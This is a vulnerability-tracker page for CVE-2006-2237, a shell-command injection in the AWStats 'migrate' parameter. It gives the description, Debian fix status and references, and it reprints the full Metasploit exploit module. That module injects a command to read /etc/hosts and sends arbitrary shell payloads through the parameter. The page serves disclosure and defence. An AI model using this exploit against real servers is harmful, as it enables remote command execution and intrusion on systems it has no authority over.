CVE-2006-2237

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-9909 webapps cgi verified

patrick · 2006-05-04

AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)

Source code queued for fetch — refresh in a moment.

EDB-16886 webapps cgi verified ruby · 3 KB

Metasploit · 2010-07-03

AWStats 6.4 < 6.5 - migrate Remote Command Execution (Metasploit)

ruby exploit Source: Exploit-DB

##
# $Id: awstats_migrate_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AWStats migrate Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
				AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
				payloads are recommended with this module. The vulnerability is only
				present when AllowToUpdateStatsFromBrowser is enabled in the AWstats
				configuration file (non-default).
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9671 $',
			'References'     =>
				[
					['CVE', '2006-2237'],
					['OSVDB', '25284'],
					['BID', '17844'],
					['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
					['URL', 'http://www.milw0rm.com/exploits/1755'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'May 04 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
				OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]),
			], self.class)
	end

	def check
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' =>
				{
					'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
				}
			}, 25)

		if (res and res.body.match(/localhost/))
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		command = Rex::Text.uri_encode("cd /tmp &&" + payload.encoded)
		sploit = datastore['URI'] + "?migrate=|echo;echo%20YYY;#{command};echo%20YYY;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"

		res = send_request_raw({
			'uri'     => sploit,
			'method'  => 'GET',
			'headers' =>
				{
					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
					'Connection' => 'Close',
				}
			}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")

			m = res.body.match(/YYY\n(.*)\nYYY/m)

			if (m)
				print_status("Command output from the server:")
				print("\n" + m[1] + "\n\n")
			else
				print_status("This server may not be vulnerable")
			end
		else
			print_status("No response from the server")
		end
	end

end

EDB-1755 webapps cgi verified

redsand · 2006-05-06

AWStats 6.5 - 'migrate' Remote Shell Command Injection

Source code queued for fetch — refresh in a moment.

Metasploit modules

exploit_unix/webapp/awstats_migrate_exec rank 600

AWStats migrate Remote Command Execution

Source fetch failed: fetch_error — view the original via the link above.

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`6.5-2`
sid	Fixed	`6.5-2`
forky	Fixed	`6.5-2`
bullseye	Fixed	`6.5-2`
bookworm	Fixed	`6.5-2`

References

https://security-tracker.debian.org/tracker/CVE-2006-2237

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.